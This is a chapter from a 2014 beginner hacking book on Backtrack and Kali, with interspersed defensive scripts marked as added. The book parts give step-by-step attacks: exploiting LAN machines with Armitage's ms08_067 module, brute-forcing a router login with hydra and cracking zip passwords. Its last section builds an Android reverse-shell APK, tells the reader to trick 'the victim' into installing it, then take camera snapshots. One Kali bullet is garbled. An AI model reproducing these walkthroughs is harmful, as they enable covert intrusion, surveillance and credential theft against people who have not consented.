In Depth with Backtrack - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 5. In Depth with Backtrack

We will cover:

* History of Backtrack

* Installing Backtrack

* Metasploit using Backtrack

* Cracking router admin pass and username

* Breaking .rar & .zip using Backtrack

* Doing some script in BT

* Backtrack was revolutionized to Kali

* Hack in smartphones

Backtrack is the number one penetration-testing operating system out there for your experiments and fun stuff. It gathers in one place the tools necessary to hack and do security work with devices, files, operating systems, software and websites.

History of backtrack

Backtrack originated from two distributions, and its intention was penetration testing. Mati Aharoni, a security consultant, developed WHAX, a Linux-based distribution.

Max Moser made a Live CD based on Knoppix that included over 300 organized tools. Backtrack itself is a combination of Knoppix and WHAX.

Installing backtrack

Backtrack is an operating system that can be run either from a Live CD or installed on the hard disk. Both options have their advantages: the Live CD is quick to use and only needs temporary space, while an installed copy stays permanently on the HDD and can be used any time. We will be using VirtualBox to install Backtrack.

1. Boot the Backtrack ISO in VirtualBox (recommended: 30 GB of disk and 1.5 GB of RAM).

2. Choose “Backtrack Text – Default Boot Text Mode” and press Enter (see Figure 5-1).

Figure 5-1 shows what the Backtrack Live CD menu looks like.

3. Now at the bash prompt type in:

startx

4. and hit Enter to open the graphical user interface.

5. To start installing, double-click Install Backtrack on the desktop.

6. Choose your language (then Forward), select your region and time zone (Forward), leave the checkbox on “Erase and use the entire disk” and then click Install.

When it has finished and restarted, the login screen will appear as follows (see Figure 5-2).

Figure 5-2 shows the login screen of Backtrack.

7. At the “bt login:” prompt fill in:

root

8. Fill in the password:

toor

9. And to start the Backtrack desktop type:

startx

Metasploit using backtrack

Did it ever pass through your thick skull what a hacker could do just by knowing your IP address? Yes, he could get complete access to your computer with ease, and it takes just a couple of minutes, maybe for the simple reason that the victim didn't update one piece of software.

Metasploit is the hacker's best friend. It is one of the most powerful ways to break into other machines. It's easy, fast, and always works. We will use our companion Backtrack for the Metasploiting.

Metasploit Terms

· Vulnerability Information Disclosure (A weakness inside the system)

· Exploit (Software that takes advantage of the vulnerability)

· Overflow (Error when a program tries to store too much data)

· Payload (Code or program that runs on the system after exploitation)

· Shellcode (code used as a payload)

Performing Metasploit to Penetrate Users in the LAN

1. First off, run Backtrack to the desktop and open the terminal. From there type in:

cd /pentest/exploits/framework3

If that doesn’t work, try this one:

cd /pentest/exploits/framework2

2. Once you're inside that directory, type in:

svn update

This makes sure you have the latest version of the Metasploit Framework (MSF) and Armitage.

3. Let’s open the software called Armitage by typing in the terminal: armitage. Click Connect when the dialog pops up, and “Yes” to start the RPC server (see Figure 5-3).

Figure 5-3 shows the Armitage dialog ready to connect.

4. Once it is open, change the DB Driver option to postgresql. Leave the DB Connect String the same and click Start MSF. It will process a few things over the network and open the software itself, which may look like this (see Figure 5-4).

Figure 5-4 shows Armitage running and ready for some Metasploiting.

5. Now go to Hosts->Nmap Scan->Quick Scan (OS detect). Here you can scan for or import hosts in your network using Nmap (see Figure 5-5).

Figure 5-5 shows the Nmap Scan section.

6. Enter the IP range you think the user might be in, for example from 30 to 40, and click OK.

Write it as 192.168.1.30-40, which means it will look for all the hosts from .30 to .40 (this is Nmap's range syntax; a /40 suffix would be read as a CIDR mask, which is not valid for an IPv4 address). The Nmap scan could take some time, depending on the size of the IP range. Here you can see the scan in progress, with the open ports of every host in your network.

7. When it’s finished a message will come up saying the scan is complete. Click OK.

8. Then you will see all the available host computers here. You can arrange them by right-clicking the gray area and choosing Layout->Stack.

Now you’ll need to find the attacks that apply to the open ports on the hosts. When you find a vulnerability, you can launch an exploit against the computer to get a Meterpreter session.

9. Now go to: Attacks->Find Attacks->by port

10. Now right click on one of the computers you found earlier and go to : Attack->smb->ms08_067_netapi

11. When the Attack configuration pops up, leave the targets to 0=>Automatic Targeting. And then click Launch.

Wait a few seconds and the host computer icon will turn red.

That means a session has been opened on that host. From now on you can take screenshots of the host computer or browse its folders. In other words, from this moment you have more privileges on the host than before.

12. To take a screenshot of the host computer, right-click its icon and choose Meterpreter 1->Explore->Screenshot. And there you have it.

13. And to explore inside the victim’s computer: Meterpreter 1->Explore->Browse Files.
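
The Armitage walkthrough above boils down to an Nmap scan followed by "Find Attacks by port", with SMB (ports 139 and 445, where ms08_067_netapi lives) as the first thing it tries. The same scan output is what an administrator should be reading to find what is exposed on the LAN before someone else does. The following Python script is an added example, not code from the book or from Armitage; it parses Nmap's grepable output (the format nmap -oG writes, which Armitage can import) and lists the hosts that have an open SMB port. The scan lines and addresses embedded in it are constructed for the example.

```python
import re

# Constructed sample of Nmap "grepable" output (what nmap -oG writes); this is not
# output from a real scan and the addresses are made up.
SAMPLE_GNMAP = """\
# Nmap scan initiated (constructed sample)
Host: 192.168.1.31 ()\tStatus: Up
Host: 192.168.1.31 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 192.168.1.35 ()\tStatus: Up
Host: 192.168.1.35 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 192.168.1.38 ()\tStatus: Down
# Nmap done (constructed sample)
"""

# SMB ports; the chapter's Armitage walkthrough attacks smb/ms08_067_netapi over these.
SMB_PORTS = {139, 445}

HOST_RE = re.compile(r"^Host:\s+(\S+)")


def parse_gnmap(text):
    """Parse -oG output into {host: {"status": str, "ports": {(port, proto): (state, service)}}}.

    Each -oG line is tab-separated: "Host: <ip> (<name>)", then fields such as
    "Status: Up" or "Ports: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ...".
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything else
        host = m.group(1)
        entry = hosts.setdefault(host, {"status": None, "ports": {}})
        for field in line.split("\t")[1:]:
            if field.startswith("Status:"):
                entry["status"] = field.split(":", 1)[1].strip()
            elif field.startswith("Ports:"):
                for item in field.split(":", 1)[1].split(","):
                    parts = item.strip().split("/")
                    if len(parts) < 5:
                        continue  # malformed entry: skip it rather than crash
                    port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
                    entry["ports"][(port, proto)] = (state, service)
    return hosts


def exposed_smb(text):
    """Hosts with an open SMB port, sorted: these are the ones to patch or firewall."""
    hosts = parse_gnmap(text)
    return sorted(
        host for host, info in hosts.items()
        if any(state == "open" and port in SMB_PORTS
               for (port, proto), (state, _svc) in info["ports"].items())
    )


if __name__ == "__main__":
    for host in exposed_smb(SAMPLE_GNMAP):
        print("SMB exposed on", host)
```

Run it against a real file with `parse_gnmap(open("scan.gnmap").read())`; every host it lists is one where the exploit step of the walkthrough has a target, so it is also the list of machines to patch or to block port 445 on.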

Cracking Router Admin Password and Username

Sometimes you might forget your router password, or you want to recover the admin password; in that case Backtrack also has a tool for it. Here I will walk you through how to recover the router password step by step.

1. Run Backtrack to the desktop and then run the terminal.

2. Make sure you have “gedit” (gedit is a text editor) installed on your Backtrack.

Type in:

gedit

(If it’s not installed, type in: apt-get install gedit)

3. Once gedit is open, save an empty file named “passwd.lst” inside the folder /code/ (in root).

4. Type in:

dhclient eth0

It will print some information. Note where it says:

DHCPACK of [your ip] from [router ip]

That is your router's IP; write it down somewhere so it can be used later.

5. Then type in the terminal:

hydra -l admin -P /code/passwd.lst -e ns -f -v [router ip] http-get /

(-l is the login name, -P the password list, -e ns additionally tries an empty password and the login name as password, -f stops at the first hit and -v is verbose.)

And then enter.

Wait a moment until the attack is finished, and there you have the password.

6. If you would like to test that it works, type in the terminal: firefox. That will launch Firefox.

7. In the URL bar type in: http://[your_router_ip]/

Fill in the username and the password you found, and voilà! You’re in. (see Figure 5-6)

Figure 5-6 shows how I hacked my own router and got into the control panel.
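
From the router's side, the hydra run above is a burst of GET / requests answered with 401 until one gets a 200. That pattern is easy to spot in the router's or web server's access log, and spotting it is what protects the admin page when the password is weak. The following Python script is an added example, not code from the book; it reads Common Log Format lines, flags any source with five or more 401 responses inside a sliding 60-second window, and flags a later 200 from that source as the "password found" moment (the point where hydra -f stops). The log lines embedded in it are constructed for the example; 192.168.1.20 mistypes once, 192.168.1.50 runs a password list.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of a router's HTTP access log in Common Log Format; these are
# made-up lines, not traffic captured from a real device.
SAMPLE_LOG = """\
192.168.1.20 - - [10/Mar/2014:12:00:00 +0000] "GET / HTTP/1.1" 401 0
192.168.1.20 - - [10/Mar/2014:12:00:09 +0000] "GET / HTTP/1.1" 200 2311
192.168.1.50 - - [10/Mar/2014:12:05:00 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:00 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [10/Mar/2014:12:05:03 +0000] "GET / HTTP/1.0" 200 2311
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Return (source_ip, timestamp, status) or None for a line that is not CLF."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("src"), ts, int(m.group("status"))


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold 401s inside a sliding window, and any later
    200 from a flagged source (the success a stop-on-first-hit run ends with).
    Returns alerts in log order."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # src -> timestamps of recent 401s
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, ts, status = rec
        if status == 401:
            recent = failures[src]
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()    # drop failures older than the window
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"src": src, "kind": "bruteforce",
                               "failures": len(recent), "at": ts.isoformat()})
        elif status == 200 and src in flagged:
            alerts.append({"src": src, "kind": "success_after_failures",
                           "failures": len(failures[src]), "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately parameters: a single mistyped password should never trip it, while a password list produces dozens of 401s per second. A router that cannot run this itself can at least be given a non-default admin password, which is the one change that makes the list in passwd.lst useless.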

Breaking .rar & .zip using Backtrack

In chapter 3 we discussed how to remove passwords with several small programs. Now I’m going to show you how to break a zip password using Backtrack. First put your password-protected compressed file on your Backtrack desktop.

1. What you want to do now is go to

start->Backtrack->Privilege Escalation->Password Attacks->Offline Attacks->fcrackzip (see Figure 5-7)

Figure 5-7 shows how I navigated to fcrackzip.

A terminal will open with these following options to choose from:

-b brute force
-D dictionary Attack
-B benchmark
-c charset characterset
-h help
-V validate
-p init-password string
-l length min-max
-u use-unzip
-m method num
-2 modulo r/m

Here is how the options used below work:

-b > bruteforce
-c a > charset lower case alphabets
-l 1-6 > length of expected password

2. I’m planning to do a brute force right now, so I’ll write (the file name contains a space, so it must be quoted):

fcrackzip -b -c a -l 1-6 "/root/Desktop/crack me.zip"

Now press Enter and Backtrack will quickly show you the password after a few attempts. But sometimes it may take years.
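
Whether it takes seconds or years is not luck: it is the size of the search space that -c and -l describe, divided by how fast the machine tries candidates. The following Python script is an added example, not code from the book or from fcrackzip; it computes the number of candidates for an fcrackzip-style charset spec and length range and turns that into a worst-case time at an assumed guess rate. The class sizes for a, A and 1 are standard (26, 26 and 10); the "!" special-character class is deliberately left out because its exact membership is not listed in this chapter, and the rate of one million guesses per second is an assumption to measure against the -B benchmark option rather than a figure from the book.

```python
# Character-class codes as fcrackzip's -c option spells them; only the classes whose
# size is unambiguous are included here (the "!" special-character class is left out).
CHARSET_CODES = {"a": 26, "A": 26, "1": 10}


def charset_size(spec):
    """Number of distinct characters described by an fcrackzip-style charset spec,
    e.g. "a" -> 26, "aA1" -> 62, ":abc" -> 3 (everything after ':' is literal)."""
    size = 0
    seen = set()
    for i, code in enumerate(spec):
        if code == ":":
            size += len(set(spec[i + 1:]))  # custom literal characters, deduplicated
            break
        if code not in CHARSET_CODES:
            raise ValueError(f"unsupported charset code {code!r}")
        if code not in seen:                # "aa" must not count lowercase twice
            seen.add(code)
            size += CHARSET_CODES[code]
    if size == 0:
        raise ValueError("empty charset")
    return size


def keyspace(spec, min_len, max_len):
    """Total candidate passwords for lengths min_len..max_len (what -l min-max covers)."""
    n = charset_size(spec)
    return sum(n ** length for length in range(min_len, max_len + 1))


def seconds_to_exhaust(spec, min_len, max_len, guesses_per_second):
    """Worst-case wall-clock time to try every candidate at the given rate."""
    return keyspace(spec, min_len, max_len) / guesses_per_second


def human_time(seconds):
    """Render seconds in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    rate = 1_000_000  # assumed guesses per second; measure your own with fcrackzip -B
    for spec, lo, hi in (("a", 1, 6), ("aA1", 1, 8), ("aA1", 1, 10)):
        print(f"-c {spec} -l {lo}-{hi}: {keyspace(spec, lo, hi):,} candidates, "
              f"up to {human_time(seconds_to_exhaust(spec, lo, hi, rate))} at {rate:,}/s")
```

The chapter's own setting, lowercase letters of length 1 to 6, is about 321 million candidates, minutes of work at that rate; mixing in uppercase and digits and going to length 8 pushes the worst case past seven years, which is the practical argument for longer, mixed-character archive passwords.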

Doing some Script in BT

Here I want you to get a bit familiar with Backtrack scripting. What I want to do is show you the possibilities in Backtrack.

1. Run Backtrack to the Desktop and run the terminal.

2. Type in:

gedit

3. Type this in gedit and, when you’re finished, save it as “hacker”:

#!/bin/bash

echo "I’m a hacker who does things for educational purposes only and nothing more."

4. Let’s go back in the terminal and type:

chmod u+x hacker

./hacker

5. Once we are this far it is time to run the script and see what it looks like. To do so we must be in the same folder where we created the script. I saved mine in the root folder (see Figure 5-8).

Figure 5-8 shows the script running in the terminal.
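
The "hacker" script shows the mechanics (shebang line, chmod u+x, ./name) but does nothing useful. The following bash script is an added example, not from the book; it uses the same mechanics with functions, arguments and exit codes to do a job that belongs right before the install section: checking that a downloaded ISO matches its published SHA-256 checksum before you boot it. The ISO name and checksum in the usage comment are placeholders, and the script assumes sha256sum from coreutils is available.

```bash
#!/bin/bash
# Added example (not from the book): verify a downloaded ISO against a published
# SHA-256 checksum before booting it. Requires sha256sum (coreutils).

# Print the SHA-256 hex digest of the file given as $1.
sha256_of_file() {
    sha256sum -- "$1" | awk '{print $1}'
}

# Exit status 0 when the file's digest matches the expected hex digest
# (compared case-insensitively), 1 otherwise. Prints nothing, so callers decide
# what to do with the result.
verify_sha256() {
    local file="$1"
    local expected
    expected=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    local actual
    actual=$(sha256_of_file "$file")
    [ "$actual" = "$expected" ]
}

# Usage: ./verify-iso backtrack.iso <expected-sha256>
# (placeholder name and checksum: take the real values from the page you
# downloaded the image from, not from the same untrusted mirror as the file)
if [ "$#" -eq 2 ]; then
    if verify_sha256 "$1" "$2"; then
        echo "OK: $1 matches the expected SHA-256"
        exit 0
    else
        echo "MISMATCH: $1 does not match; do not boot this image" >&2
        exit 1
    fi
fi
```

Save it as verify-iso, make it executable with chmod u+x verify-iso exactly as in step 4, and run ./verify-iso with the two arguments; the exit status makes it usable from other scripts as well as by hand.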

Backtrack was revolutionized to Kali

Backtrack 6 was never going to come out with new features. But the same coders who created Backtrack re-created it with new features and named it Kali. Still, many people gave it other names, like “Backtrack six” or “Reborn of Backtrack”. In the end the name was changed because it had too many new features.

Key features

Everything is the same as Backtrack, so it will be very easy for you to get used to it. The only difference is that it has more tools and features, like:

* Kali supports many more chipsets for wireless devices compared to Backtrack 5.

* Kali no longer has a pentest directory for you to launch your applications from. The new way does not require you to navigate into a directory: all you have to do is type the name of the application in the terminal from any location. If you’re not familiar with the names you can still navigate with the GUI menu.

* Kali runs on smartphones and tablets with no problem.

* With Kali, compared to Backtrack, it won’t be needed.

Which one should I use?

That is not a fair question; Kali is simply a newer version of Backtrack. Choosing between them is a matter of preference rather than facts or references. Both offer the same magnitude of hacking tools and both are similar.

Hack in Smartphones

I will be using Kali to plant a backdoor inside a smartphone so you can later do Metasploiting with it. It just takes a couple of seconds and it's fun. I tested mine on my Android device and it worked like a charm.

1. First off, run Kali to the desktop and open a terminal.

2. I will use this command: msfpayload android/meterpreter/reverse_tcp lhost=[your ip] lport=[port that you want to use] R > /root/Desktop/files.apk, so in my case I would type:

msfpayload android/meterpreter/reverse_tcp lhost=192.168.2.17 lport=8080 R > /root/Desktop/files.apk

3. Now we have created an APK file stored on my desktop. Open another terminal and type in:

msfconsole

4. Since we will do things remotely we need to configure Kali for it, so type in:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.2.17

set lport 8080

exploit

5. OK, now we are ready. Now you’ll have to figure out a way to have the victim download files.apk to his or her phone or tablet. Just find a free web host or share it in your Dropbox; I’ll leave it to your imagination.

6. Once it's downloaded and opened on the phone you can start playing in the phone. We will first list the files on the phone by typing:

ls

7. To view what apps are running you can type in:

ps

8. And now let’s take some pictures from the camera by typing:

webcam_snap 1

A tip: to view the available cameras, type webcam_list.

That lists all the cameras on the device and helps when choosing between 1 or 2 in the “webcam_snap [number]” command. (see Figure 5-8)

Small summary

Backtrack/Kali is an operating system made for penetration testing.

With Backtrack you can find the router password and username.

Metasploit is a great way to penetrate computers in the LAN and also smartphones.

Backtrack can be used for breaking the passwords of compressed files.